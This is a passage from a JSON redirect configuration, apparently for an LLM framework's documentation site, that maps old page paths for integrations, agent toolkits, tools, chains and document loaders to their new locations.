"destination": "/docs/integrations/providers/spreedly"
},
{
"source": "/docs/integrations/spreedly",
"destination": "/docs/integrations/providers/spreedly"
},
{
"source": "/en/latest/integrations/stochasticai.html",
"destination": "/docs/integrations/providers/stochasticai"
},
{
"source": "/docs/integrations/stochasticai",
"destination": "/docs/integrations/providers/stochasticai"
},
{
"source": "/en/latest/integrations/stripe.html",
"destination": "/docs/integrations/providers/stripe"
},
{
"source": "/docs/integrations/stripe",
"destination": "/docs/integrations/providers/stripe"
},
{
"source": "/en/latest/integrations/tair.html",
"destination": "/docs/integrations/providers/tair"
},
{
"source": "/docs/integrations/tair",
"destination": "/docs/integrations/providers/tair"
},
{
"source": "/en/latest/integrations/telegram.html",
"destination": "/docs/integrations/providers/telegram"
},
{
"source": "/docs/integrations/telegram",
"destination": "/docs/integrations/providers/telegram"
},
{
"source": "/en/latest/integrations/tomarkdown.html",
"destination": "/docs/integrations/providers/tomarkdown"
},
{
"source": "/docs/integrations/tomarkdown",
"destination": "/docs/integrations/providers/tomarkdown"
},
{
"source": "/en/latest/integrations/trello.html",
"destination": "/docs/integrations/providers/trello"
},
{
"source": "/docs/integrations/trello",
"destination": "/docs/integrations/providers/trello"
},
{
"source": "/en/latest/integrations/twitter.html",
"destination": "/docs/integrations/providers/twitter"
},
{
"source": "/docs/integrations/twitter",
"destination": "/docs/integrations/providers/twitter"
},
{
"source": "/en/latest/integrations/unstructured.html",
"destination": "/docs/integrations/providers/unstructured"
},
{
"source": "/docs/integrations/unstructured",
"destination": "/docs/integrations/providers/unstructured"
},
{
"source": "/en/latest/integrations/vectara/vectara_chat.html",
"destination": "/docs/integrations/providers/vectara_chat"
},
{
"source": "/docs/integrations/vectara/vectara_chat",
"destination": "/docs/integrations/providers/vectara_chat"
},
{
"source": "/en/latest/integrations/vectara/vectara_text_generation.html",
"destination": "/docs/integrations/providers/vectara_text_generation"
},
{
"source": "/docs/integrations/vectara/vectara_text_generation",
"destination": "/docs/integrations/providers/vectara_text_generation"
},
{
"source": "/en/latest/integrations/vespa.html",
"destination": "/docs/integrations/providers/vespa"
},
{
"source": "/docs/integrations/vespa",
"destination": "/docs/integrations/providers/vespa"
},
{
"source": "/en/latest/integrations/wandb_tracking.html",
"destination": "/docs/integrations/providers/wandb_tracking"
},
{
"source": "/docs/integrations/wandb_tracking",
"destination": "/docs/integrations/providers/wandb_tracking"
},
{
"source": "/en/latest/integrations/weather.html",
"destination": "/docs/integrations/providers/weather"
},
{
"source": "/docs/integrations/weather",
"destination": "/docs/integrations/providers/weather"
},
{
"source": "/en/latest/integrations/weaviate.html",
"destination": "/docs/integrations/providers/weaviate"
},
{
"source": "/docs/integrations/weaviate",
"destination": "/docs/integrations/providers/weaviate"
},
{
"source": "/en/latest/integrations/whatsapp.html",
"destination": "/docs/integrations/providers/whatsapp"
},
{
"source": "/docs/integrations/whatsapp",
"destination": "/docs/integrations/providers/whatsapp"
},
{
"source": "/en/latest/integrations/whylabs_profiling.html",
"destination": "/docs/integrations/providers/whylabs_profiling"
},
{
"source": "/docs/integrations/whylabs_profiling",
"destination": "/docs/integrations/providers/whylabs_profiling"
},
{
"source": "/en/latest/integrations/wikipedia.html",
"destination": "/docs/integrations/providers/wikipedia"
},
{
"source": "/docs/integrations/wikipedia",
"destination": "/docs/integrations/providers/wikipedia"
},
{
"source": "/en/latest/integrations/wolfram_alpha.html",
"destination": "/docs/integrations/providers/wolfram_alpha"
},
{
"source": "/docs/integrations/wolfram_alpha",
"destination": "/docs/integrations/providers/wolfram_alpha"
},
{
"source": "/en/latest/integrations/writer.html",
"destination": "/docs/integrations/providers/writer"
},
{
"source": "/docs/integrations/writer",
"destination": "/docs/integrations/providers/writer"
},
{
"source": "/en/latest/integrations/yeagerai.html",
"destination": "/docs/integrations/providers/yeagerai"
},
{
"source": "/docs/integrations/yeagerai",
"destination": "/docs/integrations/providers/yeagerai"
},
{
"source": "/en/latest/integrations/youtube.html",
"destination": "/docs/integrations/providers/youtube"
},
{
"source": "/docs/integrations/youtube",
"destination": "/docs/integrations/providers/youtube"
},
{
"source": "/en/latest/integrations/zep.html",
"destination": "/docs/integrations/providers/zep"
},
{
"source": "/docs/integrations/zep",
"destination": "/docs/integrations/providers/zep"
},
{
"source": "/en/latest/integrations/zilliz.html",
"destination": "/docs/integrations/providers/zilliz"
},
{
"source": "/docs/integrations/zilliz",
"destination": "/docs/integrations/providers/zilliz"
},
{
"source": "/docs/ecosystem/integrations/",
"destination": "/docs/integrations/"
},
{
"source": "/docs/ecosystem/integrations/:path*",
"destination": "/docs/integrations/providers/:path*"
},
{
"source": "/en/latest/ecosystem/deployments.html",
"destination": "/docs/guides/deployments/template_repos"
},
{
"source": "/en/latest/use_cases/evaluation/agent_benchmarking.html",
"destination": "/docs/guides/evaluation/agent_benchmarking"
},
{
"source": "/en/latest/use_cases/evaluation/agent_vectordb_sota_pg.html",
"destination": "/docs/guides/evaluation/agent_vectordb_sota_pg"
},
{
"source": "/en/latest/use_cases/evaluation/benchmarking_template.html",
"destination": "/docs/guides/evaluation/benchmarking_template"
},
{
"source": "/en/latest/use_cases/evaluation/data_augmented_question_answering.html",
"destination": "/docs/guides/evaluation/data_augmented_question_answering"
},
{
"source": "/en/latest/use_cases/evaluation/generic_agent_evaluation.html",
"destination": "/docs/guides/evaluation/generic_agent_evaluation"
},
{
"source": "/en/latest/use_cases/evaluation/huggingface_datasets.html",
"destination": "/docs/guides/evaluation/huggingface_datasets"
},
{
"source": "/en/latest/use_cases/evaluation/llm_math.html",
"destination": "/docs/guides/evaluation/llm_math"
},
{
"source": "/en/latest/use_cases/evaluation/openapi_eval.html",
"destination": "/docs/guides/evaluation/openapi_eval"
},
{
"source": "/en/latest/use_cases/evaluation/qa_benchmarking_pg.html",
"destination": "/docs/guides/evaluation/qa_benchmarking_pg"
},
{
"source": "/en/latest/use_cases/evaluation/qa_benchmarking_sota.html",
"destination": "/docs/guides/evaluation/qa_benchmarking_sota"
},
{
"source": "/en/latest/use_cases/evaluation/qa_generation.html",
"destination": "/docs/guides/evaluation/qa_generation"
},
{
"source": "/en/latest/use_cases/evaluation/question_answering.html",
"destination": "/docs/guides/evaluation/question_answering"
},
{
"source": "/en/latest/use_cases/evaluation/sql_qa_benchmarking_chinook.html",
"destination": "/docs/guides/evaluation/sql_qa_benchmarking_chinook"
},
{
"source": "/en/latest/additional_resources/model_laboratory.html",
"destination": "/docs/guides/model_laboratory"
},
{
"source": "/en/latest/modules/agents/agents/examples/openai_functions_agent.html",
"destination": "/docs/modules/agents/agent_types/openai_functions_agent"
},
{
"source": "/en/latest/modules/agents/agents/examples/react.html",
"destination": "/docs/modules/agents/agent_types/react_docstore"
},
{
"source": "/en/latest/modules/agents/agents/examples/self_ask_with_search.html",
"destination": "/docs/modules/agents/agent_types/self_ask_with_search"
},
{
"source": "/en/latest/modules/agents/agent_executors/examples/agent_vectorstore.html",
"destination": "/docs/modules/agents/how_to/agent_vectorstore"
},
{
"source": "/en/latest/modules/agents/agent_executors/examples/async_agent.html",
"destination": "/docs/modules/agents/how_to/async_agent"
},
{
"source": "/en/latest/modules/agents/agent_executors/examples/chatgpt_clone.html",
"destination": "/docs/modules/agents/how_to/chatgpt_clone"
},
{
"source": "/en/latest/modules/agents/agents/custom_agent.html",
"destination": "/docs/modules/agents/how_to/custom_agent"
},
{
"source": "/en/latest/modules/agents/agents/custom_agent_with_tool_retrieval.html",
"destination": "/docs/modules/agents/how_to/custom_agent_with_tool_retrieval"
},
{
"source": "/en/latest/modules/agents/agents/custom_mrkl_agent.html",
"destination": "/docs/modules/agents/how_to/custom_mrkl_agent"
},
{
"source": "/en/latest/modules/agents/agents/custom_multi_action_agent.html",
"destination": "/docs/modules/agents/how_to/custom_multi_action_agent"
},
{
"source": "/en/latest/modules/agents/agent_executors/examples/handle_parsing_errors.html",
"destination": "/docs/modules/agents/how_to/handle_parsing_errors"
},
{
"source": "/en/latest/modules/agents/agent_executors/examples/intermediate_steps.html",
"destination": "/docs/modules/agents/how_to/intermediate_steps"
},
{
"source": "/en/latest/modules/agents/agent_executors/examples/max_iterations.html",
"destination": "/docs/modules/agents/how_to/max_iterations"
},
{
"source": "/en/latest/modules/agents/agent_executors/examples/max_time_limit.html",
"destination": "/docs/modules/agents/how_to/max_time_limit"
},
{
"source": "/en/latest/modules/agents/agent_executors/examples/sharedmemory_for_tools.html",
"destination": "/docs/modules/agents/how_to/sharedmemory_for_tools"
},
{
"source": "/en/latest/modules/agents/streaming_stdout_final_only.html",
"destination": "/docs/modules/agents/how_to/streaming_stdout_final_only"
},
{
"source": "/en/latest/modules/agents/toolkits/examples/azure_cognitive_services.html",
"destination": "/docs/integrations/toolkits/azure_cognitive_services"
},
{
"source": "/docs/modules/agents/toolkits/azure_cognitive_services",
"destination": "/docs/integrations/toolkits/azure_cognitive_services"
},
{
"source": "/en/latest/modules/agents/toolkits/examples/csv.html",
"destination": "/docs/integrations/toolkits/csv"
},
{
"source": "/docs/modules/agents/toolkits/csv",
"destination": "/docs/integrations/toolkits/csv"
},
{
"source": "/en/latest/modules/agents/toolkits/examples/gmail.html",
"destination": "/docs/integrations/toolkits/gmail"
},
{
"source": "/docs/modules/agents/toolkits/gmail",
"destination": "/docs/integrations/toolkits/gmail"
},
{
"source": "/en/latest/modules/agents/toolkits/examples/jira.html",
"destination": "/docs/integrations/toolkits/jira"
},
{
"source": "/docs/modules/agents/toolkits/jira",
"destination": "/docs/integrations/toolkits/jira"
},
{
"source": "/en/latest/modules/agents/toolkits/examples/json.html",
"destination": "/docs/integrations/toolkits/json"
},
{
"source": "/docs/modules/agents/toolkits/json",
"destination": "/docs/integrations/toolkits/json"
},
{
"source": "/en/latest/modules/agents/toolkits/examples/openapi.html",
"destination": "/docs/integrations/toolkits/openapi"
},
{
"source": "/docs/modules/agents/toolkits/openapi",
"destination": "/docs/integrations/toolkits/openapi"
},
{
"source": "/en/latest/modules/agents/toolkits/examples/openapi_nla.html",
"destination": "/docs/integrations/toolkits/openapi_nla"
},
{
"source": "/docs/modules/agents/toolkits/openapi_nla",
"destination": "/docs/integrations/toolkits/openapi_nla"
},
{
"source": "/en/latest/modules/agents/toolkits/examples/pandas.html",
"destination": "/docs/integrations/toolkits/pandas"
},
{
"source": "/docs/modules/agents/toolkits/pandas",
"destination": "/docs/integrations/toolkits/pandas"
},
{
"source": "/en/latest/modules/agents/toolkits/examples/playwright.html",
"destination": "/docs/integrations/toolkits/playwright"
},
{
"source": "/docs/modules/agents/toolkits/playwright",
"destination": "/docs/integrations/toolkits/playwright"
},
{
"source": "/en/latest/modules/agents/toolkits/examples/powerbi.html",
"destination": "/docs/integrations/toolkits/powerbi"
},
{
"source": "/docs/modules/agents/toolkits/powerbi",
"destination": "/docs/integrations/toolkits/powerbi"
},
{
"source": "/en/latest/modules/agents/toolkits/examples/python.html",
"destination": "/docs/integrations/toolkits/python"
},
{
"source": "/docs/modules/agents/toolkits/python",
"destination": "/docs/integrations/toolkits/python"
},
{
"source": "/en/latest/modules/agents/toolkits/examples/spark.html",
"destination": "/docs/integrations/toolkits/spark"
},
{
"source": "/docs/modules/agents/toolkits/spark",
"destination": "/docs/integrations/toolkits/spark"
},
{
"source": "/en/latest/modules/agents/toolkits/examples/spark_sql.html",
"destination": "/docs/integrations/toolkits/spark_sql"
},
{
"source": "/docs/modules/agents/toolkits/spark_sql",
"destination": "/docs/integrations/toolkits/spark_sql"
},
{
"source": "/en/latest/modules/agents/toolkits/examples/sql_database.html",
"destination": "/docs/integrations/toolkits/sql_database"
},
{
"source": "/docs/modules/agents/toolkits/sql_database",
"destination": "/docs/integrations/toolkits/sql_database"
},
{
"source": "/en/latest/modules/agents/toolkits/examples/vectorstore.html",
"destination": "/docs/integrations/toolkits/vectorstore"
},
{
"source": "/docs/modules/agents/toolkits/vectorstore",
"destination": "/docs/integrations/toolkits/vectorstore"
},
{
"source": "/docs/modules/agents/toolkits/amadeus",
"destination": "/docs/integrations/toolkits/amadeus"
},
{
"source": "/docs/modules/agents/toolkits/github",
"destination": "/docs/integrations/toolkits/github"
},
{
"source": "/docs/modules/agents/toolkits/multion",
"destination": "/docs/integrations/toolkits/multion"
},
{
"source": "/en/latest/modules/agents/tools/custom_tools.html",
"destination": "/docs/modules/agents/tools/how_to/custom_tools"
},
{
"source": "/en/latest/modules/agents/tools/human_approval.html",
"destination": "/docs/modules/agents/tools/how_to/human_approval"
},
{
"source": "/en/latest/modules/agents/tools/multi_input_tool.html",
"destination": "/docs/modules/agents/tools/how_to/multi_input_tool"
},
{
"source": "/en/latest/modules/agents/tools/tool_input_validation.html",
"destination": "/docs/modules/agents/tools/how_to/tool_input_validation"
},
{
"source": "/en/latest/modules/agents/tools/tools_as_openai_functions.html",
"destination": "/docs/modules/agents/tools/how_to/tools_as_openai_functions"
},
{
"source": "/en/latest/modules/agents/tools/examples/apify.html",
"destination": "/docs/integrations/tools/apify"
},
{
"source": "/docs/modules/agents/tools/integrations/apify",
"destination": "/docs/integrations/tools/apify"
},
{
"source": "/en/latest/modules/agents/tools/examples/arxiv.html",
"destination": "/docs/integrations/tools/arxiv"
},
{
"source": "/docs/modules/agents/tools/integrations/arxiv",
"destination": "/docs/integrations/tools/arxiv"
},
{
"source": "/en/latest/modules/agents/tools/examples/awslambda.html",
"destination": "/docs/integrations/tools/awslambda"
},
{
"source": "/docs/modules/agents/tools/integrations/awslambda",
"destination": "/docs/integrations/tools/awslambda"
},
{
"source": "/en/latest/modules/agents/tools/examples/bing_search.html",
"destination": "/docs/integrations/tools/bing_search"
},
{
"source": "/docs/modules/agents/tools/integrations/bing_search",
"destination": "/docs/integrations/tools/bing_search"
},
{
"source": "/en/latest/modules/agents/tools/examples/brave_search.html",
"destination": "/docs/integrations/tools/brave_search"
},
{
"source": "/docs/modules/agents/tools/integrations/brave_search",
"destination": "/docs/integrations/tools/brave_search"
},
{
"source": "/en/latest/modules/agents/tools/examples/chatgpt_plugins.html",
"destination": "/docs/integrations/tools/chatgpt_plugins"
},
{
"source": "/docs/modules/agents/tools/integrations/chatgpt_plugins",
"destination": "/docs/integrations/tools/chatgpt_plugins"
},
{
"source": "/en/latest/modules/agents/tools/examples/ddg.html",
"destination": "/docs/integrations/tools/ddg"
},
{
"source": "/docs/modules/agents/tools/integrations/ddg",
"destination": "/docs/integrations/tools/ddg"
},
{
"source": "/en/latest/modules/agents/tools/examples/filesystem.html",
"destination": "/docs/integrations/tools/filesystem"
},
{
"source": "/docs/modules/agents/tools/integrations/filesystem",
"destination": "/docs/integrations/tools/filesystem"
},
{
"source": "/en/latest/modules/agents/tools/examples/google_places.html",
"destination": "/docs/integrations/tools/google_places"
},
{
"source": "/docs/modules/agents/tools/integrations/google_places",
"destination": "/docs/integrations/tools/google_places"
},
{
"source": "/en/latest/modules/agents/tools/examples/google_search.html",
"destination": "/docs/integrations/tools/google_search"
},
{
"source": "/docs/modules/agents/tools/integrations/google_search",
"destination": "/docs/integrations/tools/google_search"
},
{
"source": "/en/latest/modules/agents/tools/examples/google_serper.html",
"destination": "/docs/integrations/tools/google_serper"
},
{
"source": "/docs/modules/agents/tools/integrations/google_serper",
"destination": "/docs/integrations/tools/google_serper"
},
{
"source": "/en/latest/modules/agents/tools/examples/gradio_tools.html",
"destination": "/docs/integrations/tools/gradio_tools"
},
{
"source": "/docs/modules/agents/tools/integrations/gradio_tools",
"destination": "/docs/integrations/tools/gradio_tools"
},
{
"source": "/en/latest/modules/agents/tools/examples/graphql.html",
"destination": "/docs/integrations/tools/graphql"
},
{
"source": "/docs/modules/agents/tools/integrations/graphql",
"destination": "/docs/integrations/tools/graphql"
},
{
"source": "/en/latest/modules/agents/tools/examples/huggingface_tools.html",
"destination": "/docs/integrations/tools/huggingface_tools"
},
{
"source": "/docs/modules/agents/tools/integrations/huggingface_tools",
"destination": "/docs/integrations/tools/huggingface_tools"
},
{
"source": "/en/latest/modules/agents/tools/examples/human_tools.html",
"destination": "/docs/integrations/tools/human_tools"
},
{
"source": "/docs/modules/agents/tools/integrations/human_tools",
"destination": "/docs/integrations/tools/human_tools"
},
{
"source": "/en/latest/modules/agents/tools/examples/ifttt.html",
"destination": "/docs/integrations/tools/ifttt"
},
{
"source": "/docs/modules/agents/tools/integrations/ifttt",
"destination": "/docs/integrations/tools/ifttt"
},
{
"source": "/en/latest/modules/agents/tools/examples/metaphor_search.html",
"destination": "/docs/integrations/tools/metaphor_search"
},
{
"source": "/docs/modules/agents/tools/integrations/metaphor_search",
"destination": "/docs/integrations/tools/metaphor_search"
},
{
"source": "/en/latest/modules/agents/tools/examples/openweathermap.html",
"destination": "/docs/integrations/tools/openweathermap"
},
{
"source": "/docs/modules/agents/tools/integrations/openweathermap",
"destination": "/docs/integrations/tools/openweathermap"
},
{
"source": "/en/latest/modules/agents/tools/examples/pubmed.html",
"destination": "/docs/integrations/tools/pubmed"
},
{
"source": "/docs/modules/agents/tools/integrations/pubmed",
"destination": "/docs/integrations/tools/pubmed"
},
{
"source": "/en/latest/modules/agents/tools/examples/requests.html",
"destination": "/docs/integrations/tools/requests"
},
{
"source": "/docs/modules/agents/tools/integrations/requests",
"destination": "/docs/integrations/tools/requests"
},
{
"source": "/en/latest/modules/agents/tools/examples/sceneXplain.html",
"destination": "/docs/integrations/tools/sceneXplain"
},
{
"source": "/docs/modules/agents/tools/integrations/sceneXplain",
"destination": "/docs/integrations/tools/sceneXplain"
},
{
"source": "/en/latest/modules/agents/tools/examples/search_tools.html",
"destination": "/docs/integrations/tools/search_tools"
},
{
"source": "/docs/modules/agents/tools/integrations/search_tools",
"destination": "/docs/integrations/tools/search_tools"
},
{
"source": "/en/latest/modules/agents/tools/examples/searx_search.html",
"destination": "/docs/integrations/tools/searx_search"
},
{
"source": "/docs/modules/agents/tools/integrations/searx_search",
"destination": "/docs/integrations/tools/searx_search"
},
{
"source": "/en/latest/modules/agents/tools/examples/serpapi.html",
"destination": "/docs/integrations/tools/serpapi"
},
{
"source": "/docs/modules/agents/tools/integrations/serpapi",
"destination": "/docs/integrations/tools/serpapi"
},
{
"source": "/en/latest/modules/agents/tools/examples/twilio.html",
"destination": "/docs/integrations/tools/twilio"
},
{
"source": "/docs/modules/agents/tools/integrations/twilio",
"destination": "/docs/integrations/tools/twilio"
},
{
"source": "/en/latest/modules/agents/tools/examples/wikipedia.html",
"destination": "/docs/integrations/tools/wikipedia"
},
{
"source": "/docs/modules/agents/tools/integrations/wikipedia",
"destination": "/docs/integrations/tools/wikipedia"
},
{
"source": "/en/latest/modules/agents/tools/examples/wolfram_alpha.html",
"destination": "/docs/integrations/tools/wolfram_alpha"
},
{
"source": "/docs/modules/agents/tools/integrations/wolfram_alpha",
"destination": "/docs/integrations/tools/wolfram_alpha"
},
{
"source": "/en/latest/modules/agents/tools/examples/youtube.html",
"destination": "/docs/integrations/tools/youtube"
},
{
"source": "/docs/modules/agents/tools/integrations/youtube",
"destination": "/docs/integrations/tools/youtube"
},
{
"source": "/en/latest/modules/agents/tools/examples/zapier.html",
"destination": "/docs/integrations/tools/zapier"
},
{
"source": "/docs/modules/agents/tools/integrations/zapier",
"destination": "/docs/integrations/tools/zapier"
},
{
"source": "/en/latest/modules/callbacks/filecallbackhandler.html",
"destination": "/docs/modules/callbacks/how_to/filecallbackhandler"
},
{
"source": "/en/latest/modules/callbacks/examples/argilla.html",
"destination": "/docs/integrations/callbacks/argilla"
},
{
"source": "/docs/modules/callbacks/integrations/argilla",
"destination": "/docs/integrations/callbacks/argilla"
},
{
"source": "/en/latest/modules/chains/examples/extraction.html",
"destination": "/docs/modules/chains/additional/extraction"
},
{
"source": "/en/latest/modules/chains/examples/flare.html",
"destination": "/docs/use_cases/question_answering/how_to/flare"
},
{
"source": "/en/latest/modules/chains/examples/graph_cypher_qa.html",
"destination": "/docs/use_cases/graph/graph_cypher_qa"
},
{
"source": "/en/latest/modules/chains/examples/graph_nebula_qa.html",
"destination": "/docs/use_cases/graph/graph_nebula_qa"
},
{
"source": "/en/latest/modules/chains/index_examples/graph_qa.html",
"destination": "/docs/use_cases/graph/graph_qa"
},
{
"source": "/en/latest/modules/chains/index_examples/hyde.html",
"destination": "/docs/use_cases/question_answering/how_to/hyde"
},
{
"source": "/en/latest/modules/chains/examples/llm_bash.html",
"destination": "/docs/use_cases/code_writing/llm_bash"
},
{
"source": "/en/latest/modules/chains/examples/llm_checker.html",
"destination": "/docs/use_cases/self_check/llm_checker"
},
{
"source": "/en/latest/modules/chains/examples/llm_math.html",
"destination": "/docs/use_cases/code_writing/llm_math"
},
{
"source": "/en/latest/modules/chains/examples/llm_requests.html",
"destination": "/docs/use_cases/apis/llm_requests"
},
{
"source": "/en/latest/modules/chains/examples/llm_summarization_checker.html",
"destination": "/docs/use_cases/self_check/llm_summarization_checker"
},
{
"source": "/en/latest/modules/chains/examples/openapi.html",
"destination": "/docs/use_cases/apis/openapi"
},
{
"source": "/en/latest/modules/chains/examples/pal.html",
"destination": "/docs/use_cases/code_writing/pal"
},
{
"source": "/en/latest/modules/chains/examples/tagging.html",
"destination": "/docs/use_cases/tagging"
},
{
"source": "/en/latest/modules/chains/index_examples/vector_db_text_generation.html",
"destination": "/docs/use_cases/question_answering/how_to/vector_db_text_generation"
},
{
"source": "/en/latest/modules/chains/generic/router.html",
"destination": "/docs/modules/chains/foundational/router"
},
{
"source": "/en/latest/modules/chains/generic/transformation.html",
"destination": "/docs/modules/chains/foundational/transformation"
},
{
"source": "/en/latest/modules/chains/generic/async_chain.html",
"destination": "/docs/modules/chains/how_to/async_chain"
},
{
"source": "/en/latest/modules/chains/generic/custom_chain.html",
"destination": "/docs/modules/chains/how_to/custom_chain"
},
{
"source": "/en/latest/modules/chains/generic/from_hub.html",
"destination": "/docs/modules/chains/how_to/from_hub"
},
{
"source": "/en/latest/modules/chains/generic/serialization.html",
"destination": "/docs/modules/chains/how_to/serialization"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/acreom.html",
"destination": "/docs/integrations/document_loaders/acreom"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/acreom",
"destination": "/docs/integrations/document_loaders/acreom"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/airbyte_json.html",
"destination": "/docs/integrations/document_loaders/airbyte_json"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/airbyte_json",
"destination": "/docs/integrations/document_loaders/airbyte_json"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/airtable.html",
"destination": "/docs/integrations/document_loaders/airtable"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/airtable",
"destination": "/docs/integrations/document_loaders/airtable"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/alibaba_cloud_maxcompute.html",
"destination": "/docs/integrations/document_loaders/alibaba_cloud_maxcompute"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/alibaba_cloud_maxcompute",
"destination": "/docs/integrations/document_loaders/alibaba_cloud_maxcompute"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/apify_dataset.html",
"destination": "/docs/integrations/document_loaders/apify_dataset"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/apify_dataset",
"destination": "/docs/integrations/document_loaders/apify_dataset"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/arxiv.html",
"destination": "/docs/integrations/document_loaders/arxiv"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/arxiv",
"destination": "/docs/integrations/document_loaders/arxiv"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/aws_s3_directory.html",
"destination": "/docs/integrations/document_loaders/aws_s3_directory"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/aws_s3_directory",
"destination": "/docs/integrations/document_loaders/aws_s3_directory"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/aws_s3_file.html",
"destination": "/docs/integrations/document_loaders/aws_s3_file"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/aws_s3_file",
"destination": "/docs/integrations/document_loaders/aws_s3_file"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/azlyrics.html",
"destination": "/docs/integrations/document_loaders/azlyrics"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/azlyrics",
"destination": "/docs/integrations/document_loaders/azlyrics"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/azure_blob_storage_container.html",
"destination": "/docs/integrations/document_loaders/azure_blob_storage_container"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/azure_blob_storage_container",
"destination": "/docs/integrations/document_loaders/azure_blob_storage_container"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/azure_blob_storage_file.html",
"destination": "/docs/integrations/document_loaders/azure_blob_storage_file"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/azure_blob_storage_file",
"destination": "/docs/integrations/document_loaders/azure_blob_storage_file"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/bibtex.html",
"destination": "/docs/integrations/document_loaders/bibtex"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/bibtex",
"destination": "/docs/integrations/document_loaders/bibtex"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/bilibili.html",
"destination": "/docs/integrations/document_loaders/bilibili"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/bilibili",
"destination": "/docs/integrations/document_loaders/bilibili"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/blackboard.html",
"destination": "/docs/integrations/document_loaders/blackboard"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/blackboard",
"destination": "/docs/integrations/document_loaders/blackboard"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/blockchain.html",
"destination": "/docs/integrations/document_loaders/blockchain"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/blockchain",
"destination": "/docs/integrations/document_loaders/blockchain"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/chatgpt_loader.html",
"destination": "/docs/integrations/document_loaders/chatgpt_loader"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/chatgpt_loader",
"destination": "/docs/integrations/document_loaders/chatgpt_loader"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/college_confidential.html",
"destination": "/docs/integrations/document_loaders/college_confidential"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/college_confidential",
"destination": "/docs/integrations/document_loaders/college_confidential"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/confluence.html",
"destination": "/docs/integrations/document_loaders/confluence"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/confluence",
"destination": "/docs/integrations/document_loaders/confluence"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/conll-u.html",
"destination": "/docs/integrations/document_loaders/conll-u"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/conll-u",
"destination": "/docs/integrations/document_loaders/conll-u"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/copypaste.html",
"destination": "/docs/integrations/document_loaders/copypaste"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/copypaste",
"destination": "/docs/integrations/document_loaders/copypaste"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/csv.html",
"destination": "/docs/integrations/document_loaders/csv"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/csv",
"destination": "/docs/integrations/document_loaders/csv"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/diffbot.html",
"destination": "/docs/integrations/document_loaders/diffbot"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/diffbot",
"destination": "/docs/integrations/document_loaders/diffbot"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/discord.html",
"destination": "/docs/integrations/document_loaders/discord"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/discord",
"destination": "/docs/integrations/document_loaders/discord"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/docugami.html",
"destination": "/docs/integrations/document_loaders/docugami"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/docugami",
"destination": "/docs/integrations/document_loaders/docugami"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/duckdb.html",
"destination": "/docs/integrations/document_loaders/duckdb"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/duckdb",
"destination": "/docs/integrations/document_loaders/duckdb"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/email.html",
"destination": "/docs/integrations/document_loaders/email"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/email",
"destination": "/docs/integrations/document_loaders/email"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/embaas.html",
"destination": "/docs/integrations/document_loaders/embaas"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/embaas",
"destination": "/docs/integrations/document_loaders/embaas"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/epub.html",
"destination": "/docs/integrations/document_loaders/epub"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/epub",
"destination": "/docs/integrations/document_loaders/epub"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/evernote.html",
"destination": "/docs/integrations/document_loaders/evernote"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/evernote",
"destination": "/docs/integrations/document_loaders/evernote"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/excel.html",
"destination": "/docs/integrations/document_loaders/excel"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/excel",
"destination": "/docs/integrations/document_loaders/excel"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/facebook_chat.html",
"destination": "/docs/integrations/document_loaders/facebook_chat"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/facebook_chat",
"destination": "/docs/integrations/document_loaders/facebook_chat"
},
{
